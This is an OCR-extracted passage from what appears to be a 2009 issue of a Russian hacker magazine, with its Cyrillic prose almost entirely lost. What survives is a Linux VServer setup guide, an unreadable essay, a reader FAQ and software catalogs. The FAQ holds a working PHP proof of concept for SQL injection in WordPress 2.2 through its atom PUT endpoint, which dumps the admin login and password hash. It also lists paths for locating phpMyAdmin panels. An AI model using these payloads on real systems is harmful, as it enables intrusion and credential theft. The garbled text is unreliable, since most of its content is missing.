at/Experimental/patch-2.6.28.7vs2.3.0.36.8.diff
2. ,
:
# tar -xjf linux-2.6.28.7.tar.bz2
X 08 /128/ 09
>> SYN/ACK
eth0 82.195.23.28
IPTables
iptables -t nat -A POSTROUTING \
-s 192.168.1.1/24 -d ! 192.168.1.1/24 \
-J SNAT --to-source 82.195.23.28
Linux VPS
eth0: alias 192.168.1.1
Linux
Host System
#
#
#
#
cd linux-2.6.28.7
cp /boot/config-X.X.X .
patch -p1 < ../patch-2.6.28.7-vs2.3.0.36.8.diff
make menuconfig
3. Linux VServer:
Enable Legacy Kernel API API .
Enable Virtualized Guest Time . ,
,
Enable Proc Security , , /proc .
4. :
# make
# make modules_install
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.28.7-vs2.3
5. :
# VI /BOOT/GRUB/MENU.LST
title Linux 2.6.28.7-vs2.3
root (hd0,0)
kernel /boot/vmlinuz-2.6.28.7-vs2.3 root=/dev/hda1 ro
initrd /boot/initrd.img-2.6.28.7-vs2.3
boot
6. :
# cd /tmp
# wget http://ftp.linux-vserver.org/pub/utils/utilvserver/util-vserver-0.30.215.tar.bz2
# tar xjf util-vserver-0.30.215.tar.bz2
# cd util-vserver-0.30.215
# ./configure --prefix=/usr --sysconfdir=/etc
# make install
X 08 /128/ 09
( Linux VServer),
. ,
,
, tag.
, , ,
.
/etc/fstab, , , /var/lib (
/var/lib/vservers),
tag. :
/dev/sda3 /var ext3 tag 1 1
reiserfs,
attrs. .
Chroot Barrier,
,
:
# setattr --barrier /var/lib/vservers
kernel.vshelper , :
# echo "kernel.vshelper = /usr/lib/util-vserver/vshelper"
>> /etc/sysctl.conf
# sysctl -p
Linux-,
. ,
()
. ftp://ftp.
pld-linux.org/people/hawk/vserver-templates/,
CentOS, Debian, Fedora Ubuntu,
VServer.
Ubuntu ( ,
):
$ cd /tmp
$ wget ftp://ftp.pld-linux.org/people/hawk/vservertemplates/Ubuntu/jaunty-i386.tar.bz2
133
>> SYN/ACK
VSERVER-STAT
PS
INFO
info
/
var/lib/vserver.
, /
etc/vserver/.defaults/
vdirbase
.
vserver
,
(vserver
delete),
(vserver exec),
(vserver
rpm, vserver apt-get).
/var/lib/
vservers/vps1 .
, vps1, ( ),
vps1.
host.ru,
eth0 IP- 192.168.1.1,
(plain /sbin/init). ,
/tmp/
jaunty-i386.tar.bz2, Ubuntu 9.04
(Jaunty Jackalope).
VServer
, (
),
, man- vserverbuild.
:
# vserver vps1 start
# vserver-stat
LINUX VSERVER
- IP-
.
(0
, 1 ..)
, 1
:
// eth1
-
# echo "eth1" > dev
// IP-
# echo "192.168.1.2" > ip
# echo "24" > prefix
, ifconfig,
,
. VServer
,
.
. , /etc/fstab,
/etc/vservers/vps1/fstab.
,
/dev, /proc /tmp, , , - (
Gentoo):
/usr/portage /usr/portage none bind,rw 0 0
WARNING
.
:
# vserver vps1 stop
warning
top ps
,
.
,
vps vtop.
134
, ,
.., /
etc/vservers/_. /
etc/servers/vps1 .
interfaces,
0.
,
. Linux VServer,
FreeBSD Jail,
IP- ,
,
.
:
1. IP- ( ).
2. NAT -
,
-
.
. SNAT,
:
X 08 /128/ 09
>> SYN/ACK
# chxid -URx -c vps1 /var/lib/vservers/vps1
,
vdlimit,
:
# vdlimit --xid vps1 /var/lib/vservers/vps1
, /etc/
vservers/vps1/dlimits/root vdlimit '--remove',
:
/DEV
,
# iptables -t nat -A POSTROUTING -s 192.168.1.1/24 \
-d ! 192.168.1.1/24 -j SNAT --to-source < IP>
DNAT,
IP- (
web-, VServer):
# iptables -t nat -A PREROUTING -s ! 192.168.1.1/24 \
-m tcp -p tcp --dport 80 \
-j DNAT --to-destination 192.168.1.1:80
, , dlimits rlimits.
,
-. , /etc/vservers/vps1/dlimits, , :
# cd /etc/vservers/vps1
# mkdir dlimits
( ):
# mkdir dlimits/root
# cd dlimits/root
, :
# echo "/var/lib/vservers/vps1" > directory
( ):
# echo "10000" > inodes_total
, ( 10 ):
# echo "10485760" > space_total
root :
# echo "5" > reserved
,
vps1 (, , ):
X 08 /128/ 09
/etc/vservers/_/
rlimits. Linux VServer setrlimit(2)
. 22
(15 + 7,
Linux VServer), ( = 4 x86):
cpu , ,
fsize
rss
nproc
as
nice ,
nsock
openfd
,
/etc/
vservers/_/rlimits. , 100 (25600*4 ):
# mkdir /etc/vservers/vps1/rlimits
# echo "25600" > /etc/vservers/vps1/rlimits/as
, Linux VServer ,
, ,
. , , /
etc/vservers/_/ccapabilities.
:
SET_UTSNAME
setdomainname(2) sethostname(2)
SET_RLIMIT setrlimit(2)
RAW_ICMP ""
SYSLOG syslog(2)
SECURE_MOUNT mount(2)
SECURE_REMOUNT
BINARY_MOUNT /
QUOTA_CTL
ADMIN_MAPPER "device mapper"
ADMIN_CLOOP loop-
KTHREAD
,
flags, nflags, bcapabilities ncaps.
linux-vserver.org/util-vserver:Capabilities_
and_Flags.z
135
>> units
/ LOZOVSKY@GAMELAND.RU /
PSYCHO:
, , PSYCHO-, ,
,
- , , , .
,
,
, -. ,
,
-, ,
.
, -
,
.
, ,
,
, -.
, homo sapiens.
.
,
,
. -
,
?
?
136
?
,
, , ?
.
.
(- 8-10
) . ,
.
.
?
.
,
/ ,
. , , ,
.
, ,
,
.
,
IT-.
,
,
.
.
,
(
) .
. -
, - , -
.
,
.
. ,
, , ,
. ,
-, ,
-, , ,
. ,
,
,
, , , . ?
, ,
. , .
.
?
, ,
,
?
,
, ,
.
,
, .
, .
,
- .
, ,
,
.
-
. . ?
! -
,
,
,
. ,
25 , , ,
, , , .
, ,
,
, , , ,
. , ,
-
-
-, ,
.
, , X 08 /128/ 09
>> units
.
. ,
,
,
,
.
( !) .
,
. , ,
,
,
.
,
( , , ?),
. ,
:
,
. .
,
,
.
,
, .
X 08 /128/ 09
, ,
,
.
,
,
,
.
, ,
! ,
! ,
, ,
30-45 .
,
?
. ,
.
,
, . -
(
), -
. .
, .
(-, , ,
), ,
,
.
, . .
( , )
.
,
,
.
,
(---)
.
,
,
,
. ,
,
,
.
. .
.
.
, , .
.
,
(,
). ?
.
, ,
,
,
.. ,
,
.
: -
, -
, - ,
.
.
, ,
137
>> units
,
, .
,
, ,
, ,
. ! , , ,
!
,
,
, , .
,
-, ,
,
.
z: ,
?
..: -
.
, -
138
.
,
, ?
, -
.
,
, ,
. , ,
.
,
?
-
, ,
.
z: ,
. :
,
,
?
..: . , .
.
z: ?
..: .
-,
.
.
,
.
z: ,
?
,
?
..:
,
( ,
).
, ,
,
. ?
,
,
(, ,
,
).
. ,
, ,
, .
.
, , , ,
( )
.
.
, ,
. .
.
z: -
?
?
..:
. .
,
.
, ,
.
.
,
.
, ,
.
, : X 08 /128/ 09
>> units
.
.
.
(
), , .
, ,
.
z: , , -
.
.
..: . ,
, ,
, .
,
, ,
. , .
-,
.
z: -
,
?
..:
.
, . ,
.
, .
, ,
- . , , .
, ,
.
z: . -
. ,
?
.
..:
:
1. ,
,
.
2. , ,
.
3. .
. , ,
, ,
. ! ,
,
, , ,
.
, .
,
,
.
,
.
4. , .
. ,
, ,
. ,
.
,
.
,
,
.
, -
.
,
,
,
,
,
.
,
,
,
, .
, ,
.
,
,
,
.
,
. ,
, ,
, ,
:
,
,
.
,
, ,
,
,
.
,
( -
).
,
,
,
.
, ,
,
,
java
programming for dummies.
,
. ,
, ,
/
. ! z
5. !
.
. .
, ,
.
X 08 /128/ 09
139
>> units
FAQ UNITED:
Q: Google PR, .
Alexa rank?
A: ! Alexa.com
XML- ,
, , rank,
(, ,
..).
rank:
<?php
function alexarank($url,
$ip = '127.0.0.1')
{
$url = preg_replace(
'/https?:\/\//i', '', $url);
$uid = sprintf(
'2007%02d%02d%02d%02d%02d',
rand(1,12), rand(1,28),
rand(1,24), rand(1,60),
rand(1,60));
$alexa_url = 'http://xml.alexa.
com/data?cli=10&dat=nsa&ver=quirksearchstatus&uid=' .$uid .
'&userip=' . $ip . '&url=' .
urlencode($url);
$content = file_get_
contents($alexa_url);
if (preg_match(/<POPULARITY
140
URL="[^"]+" TEXT="(\d+)"\/>/i',
$content, $matches))
{
return trim($matches[1]);
}
return 'Unknown';
}
print alexarank('google.com');
?>
XML-
Alexa.
Q: PHP- Alexa rank?
?
, :
<?php
$netcraft = file_get_
contents('http://searchdns.
netcraft.com/?position=limited&hos
t=google.com');
preg_match('|<a href="http://
uptime\.netcraft\.com/up/
graph/\?host=[a-z0-9\._-]+">(.+?)</
a>|i',$netcraft,$os_arr);
print $os_arr[1];
?>
, Nmap (, , - 10 ,
. Step).
A: ,
alexa.com ( ,
),
- Google PR/Alexa rank; , http://
extra-traffic.com/pra_checker.htm.ru.htm.
,
15 .
Q: PHP , ?
A: -
netcraft.com,
Q:
- /.
, ?
A:
http://whitepages.
anywho.com,
:).
, :
1. Last Name (Required)
, , Jackson (RIP! . );
2. State
, , CA;
X 08 /128/ 09
>> units
3. Find A Person;
4. , , :
3. <Enter>
:)
(site:site.com
phpmyadmin), robots.txt .
Q: 100%-
A L Jackson
Some address
Some city, CA some zip code
(408) some phone number
Q: ,
A: ,
mysql?
d_x Forum
Detector. :
A: ! ,
Q: ,
?
A: whoer.net -
. (
whoer.net/ext),
:
1. IP Address ( , IP,
, ip ,
whois).
2. Location (, , , ,
, /,
).
3. Time (, , , UTC, GMT, ).
4. HTTP Headers ( ,
).
5. Scripts ( ActiveX, VBScript,
JavaScript, Java).
6. , (,
).
7. Navigator ( ).
8. Plugins (, ).
, -
. , /
/VPN.
Q: -
?
A: DeeIP, WHB, -
. :
1. ,
,
;
2.
javascript-:
JavScript: this.disabled=true;
document.regMe.submit();
X 08 /128/ 09
(
IPB, phpBB, vBulletin, MyBB)
(, )
PR
, socks5, , socks5
2 :
1.
mysql -h[host] -u[user] -p[pass]
[base] < dump.sql
2.
mysqldump -h[host] -u[user] -p[pass]
[base] > dump.sql
. ,
:
mysqldump -h[host] -u[user] -p[pass]
[base]|tar zcfv base.tar.gz
: http://forum.
antichat.ru/thread114708.html.
mysql?
Q:
A:
phpMyAdmin?
PHP-
Sypex Dumper (sypex.net/products/dumper), , ,
- ,
,
,
.
:
;
;
;
;
;
;
.
Q: -
PhpMyAdmin !
A: -
,
phpmyadmin:
/phpMyAdmin-x.x.x/ ( x.x.x
)
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmi/
, phpmyadmin
Q:
WordPress. - .
A: :).
sql- ,
Alex Concha
141
>> units
buayacorp.com.
, ./wp-includes/atomlib.php
:
function xml_escape($string)
{
return str_replace(
array('&','"',"",'<','>'),
array('&','"',''','<','>'),
$string );
}
, ,
,
PUT atom-,
\ ( WordPress, ,
GET, POST,
COOKIE, SERVER ).
,
, 2.2
2.7.1,
,
.
2.2 2.2.3 edit_posts (
,
):
<?php
$site='lamer.com';
$path='/wp223/wp-app.php?action=/
post/1'; //
$user='editor'; //
$passwd='editor'; //
$auth=base64_
encode($user.":".$passwd);
$fp = fsockopen($site, 80, $errno,
$errstr, 30);
$data=<feed>
<entry>
<id>http://lamer.com/
wp223/2009/03/01/hello-world/</id>
<title type="html">test\</
title>
<summary type="html">,post_
name=(select concat(user_
login,0x3a,user_pass) from wp_users
where ID=1) where id=1/*</summary>
</entry>
</feed>';
$out = "PUT $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-Type: application/
atom+xml\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera\r\n";
$out .= "Authorization: Basic
$auth\r\n";
$out .= "Content-Length:
".strlen($data)."\r\n\r\n";
142
fwrite($fp, $out.$data);
fclose($fp);
?>
http://lamer.
com/?p=[ID ]. @test, post_excerpt =,
- :
http://lamer/wp222/2009/03/01/admin:21232f29
7a57a5a743894a0e4a801fc3/ (-,
).
Q: , ,
.mp4. ,
,
.
90 .
(, ,
)?
A: :).
- .
( lossless).
VirtualDub
(www.virtualdub.org). :
1. File Open
video File;
2. Video Filters, ( Add) Rotate.
3. : left
by 90 right by 90.
.
. Video
Full processing mode.
Video
compression.
4. File Save as
AVI.
5. ,
AVI-.
Picasa (picasa.google.com/intl/ru),
.
Q: VMWare
Fedora 10 (iso )
.
chaosreader
(chaosreader.sourceforge.net),
Perl. -
tcpdump snoff,
HTML- telnet-,
, FTP,
http- (HTML-,
GIF JPEG) .. ..
pcapsipdump (sourceforge.net/projects/
psipdump) ,
SIP-, .
SIP-
.
Smbsniff (http://www.hsc.fr/ressources/outils/
smbsniff/index.html.en) , SMB/
CIFS. , ,
.
,
, Tcpreplay (tcpreplay.synfin.
net), .
tcprewrite , .
tcpreplay
: tcpreplay --intf1=eth0
sample.pcap.
Q: 2-hop SSH. -
SSH Proxy?
A: , serv1,
serv1.mydomain.com.
serv2 192.168.1.100,
, serv1,
.
locuser,
remuser.
SSH-, ~/.ssh/
config :
Host *
ForwardAgent yes
Host serv1
HostName alpha.pupkin.net
User locuser
. , Up <Alt+F2>.
?
A: , . -
/etc/vmware/
config:
xkeymap.nokeycodeMap = true
Q: tcpdump (tcpdump,
Wireshark, Kismet ) ?
A: ,
Wireshark
(www.wireshark.org), .
Host serv2
HostName 192.168.1.100
User remuser
ProxyCommand ssh serv1 nc %h %p
?
serv1 serv2
. SSH , ssh alpha.
ssh beta
serv2, alpha.
netcat
(netcat.sourceforge.net). z
X 08 /128/ 09
SSH-
PuTTY
PuTTY Connection Manager
MobaSSH
freeSSHd
WinSCP
Tera Term
WiSSH
>Net
BluetoothView 1.30
Gmail Manager 0.5.7.2
HTTrack Website Copier 3.43
Psi for Windows 0.13
uTorrent 1.8.3
>Misc
7stacks 1.2
AutoHotkey 1.0.48.03
Ditto 3.16.7
f.lux
High Sign Alpha Preview 2
MyTourbook 9.07
Nexus 9.7b2
Stickies 6.7a
>Development
HelpNDoc 2.1
IronRuby 0.9
JProfiler 5.2
Microsoft Expression Blend 3 +
SketchFlow
Microsoft Silverlight 3 SDK
Microsoft Silverlight 3 Tools for
Visual Studio 2008 SP1
MySQL Workbench 5.2 Alpha
Silverlight 3 Toolkit July 2009
Translate.Net 0.1.3493
WinHex 15.4
>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns for Windows v9.5
DAEMON Tools Lite 4.30.4
Download Master 5.5.12.1172
FarPowerPack 1.15
FileZilla Client 3.2.7-rc1
K-Lite Mega Codec Pack 5.0
Miranda IM 0.8.3
Mozilla Firefox 3.5.2
Notepad++ 5.4.5
Opera 9.64
PuTTY 0.60
QIP 2005 Build 8094
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96.2
Project Voldemort
Apache CouchDB
Redis
MemcacheDB
>>UNIX
>Devel
Adobe AIR 1.5.2
Aptana Studio 1.5
Bouml 4.13.1
fingerprint'
Nmap
p0f v2
THC-Amap
httprint
NetworkMiner
ike-scan
Xprobe2
Satori
SinFP
>Security
Aircrack-ng 1.0RC4
bsqlbf 2.3
Charles 3.3.1
Damn Vulnerable Web App 1.0.4
dhcdrop 0.4
dradis 2.2
GFI LANguard 9
Kon-Boot 1.1
Microsoft KAPIMON 5.1
ophcrack 3.3.1
Pangolin 2.5.2.975
Privoxy2 3.0.14
ProxyStrike 2.1
SCRT Webshag 1.10
Sipflanker 1.5beta
sqlmap 0.7
Tor IM Browser Bundle 1.2.6
Watcher 1.2.1
Wireshark 1.2.1
>System
Apache HTTP Server Version 2.2
Agnitum Outpost Firewall Free 2009
AVG Anti-Virus Free Edition 8.5
DiskDigger 0.8.3
HDDScan 3.2
HWiNFO32 3.10
MyDefrag 4.1.2
Outpost Firewall Pro 2009
Process Lasso 3.63b
R-Studio 5.00
UNetbootin 3.57
USB-Drive Protector 1.02
VirtualBox 3.0.2
Xming 7.4.0.3
>Multimedia
ImgBurn 2.5
MediaInfo 0.7.9
MetatOGGer 3.9.2.0
Nero Free 9.4.12.3
PDFTools 1.3
Shup 0.27
SmillaEnlarger 0.8
STDU Viewer 1.5.275
VirtualDub 1.9.4
VLC (VideoLAN) 1.0.1
>Security
Aircrack-ng 1.0rc4
beholder 0.8.6
dhcdrop 0.4
Dradis 2.2.0
Grendel Scan 1.0
Justniffer 0.5.6
Middler 1.0
mysqltr4cker 1.2
Nmap 5.0
nschaind 0.3
packet-o-matic 20090726
PHPIDS 0.6
Privoxy 3.0.14b
sipflanker 1.5beta
sshdautoban 0.75
Tor 0.2.0.35
Vidalia 0.1.15
VoIPER 0.0.7
WEPBuster 1.0
Yaptest 0.2.1
>X-Distr
Linux From Scratch 6.4
Solaris 10
>System
ATI 9.7
Collectd 4.7.2
JPC
Linux Kernel 2.6.30.4
LVM2 2.02.50
Man pages 3.22
nVidia 185.18.29
quagga 0.99.14
Safecopy 1.5
Sudo 1.7.2
Virtualbox 3.0.2
Wine 1.1.26
Xf86-video-intel 2.8.0
>Net
Adobe Flash Player 10.0.32.18
aria2 1.5.1
Arora 0.8
Fetchmail 6.3.10
Flock 2.5.1
gPodder 0.17.0
KMess 2.0
Liferea 1.6
Linuxdcpp 1.0.3
Lynx 2.8.7
Minitube 0.5
Miro 2.5
Mozilla Firefox 3.5.1
Opera 9.64
Psi 0.13
Putty 0.60
qutIM 0.2 beta2
Sylpheed 2.7
WeeChat 0.3.0 rc2
Xchat 2.8.6
>Games
ManiaDrive 1.2
>Server
Apache 2.2.12
Asterisk 1.4.26
BIND 9.4.3 P3
Cups 1.4rc1
Dovecot 1.2.2
HAproxy 1.3.19
Hybrid 7.2.3
IRC Services 5.1.9
Kamailio 1.5.2
NFS Ganesha 0.99.57
OpenDS 2.0
OpenLDAP 2.4.17
OpenSSH 5.2
OpenVPN 2.1rc19
Prosody 0.5.1
rsyslog 4.5.1
Samba 3.4
Squid 3.0.STABLE17
Xorg server 1.6.3
Bugzilla 3.4
Bviplus 0.5.2
Clutter 1.0.0
Django 1.1
gtk+ 2.17.6
GtkHTML 3.26.3
jEdit 4.2
MILEPOST GCC 4.4.0
MPS 1.0
Nasm 2.07
pgAdmin 1.10.0
Scons 1.2.0
SmartCVS 7.0.9
SWIG 1.3.39
Unique 0.18
Zend Framework 1.9.0
Zend Studio 7.0
08(128) 2009
x
. 26
fingerprinting
. 20
SQL
: 2
10
.
. 52
PCI
SQL!
START
. 56
. 46
08 (128) 2009
HTTP://WWW2
.
- . ,
, .
What The Font ,
, .
. , ,
-
-.
Firefox
FIREFOX BUILDER
ffbuilder.ru
,
Firefox, .
. : ffbuilder.ru . : , ,
!
144
PHOTOSHOP ONLINE
www.photoshop.com
Adobe -
Photoshop. , ,
. ,
, ,
Photoshop online. ,
.
Linux-
SUSE STUDIO
susestudio.com
!
- .
JeOS, openSUSE SUSE Linux Enterprise,
,
.
: ISO-, LiveCD,
Xen VMware.
, !
X 08 /128/ 09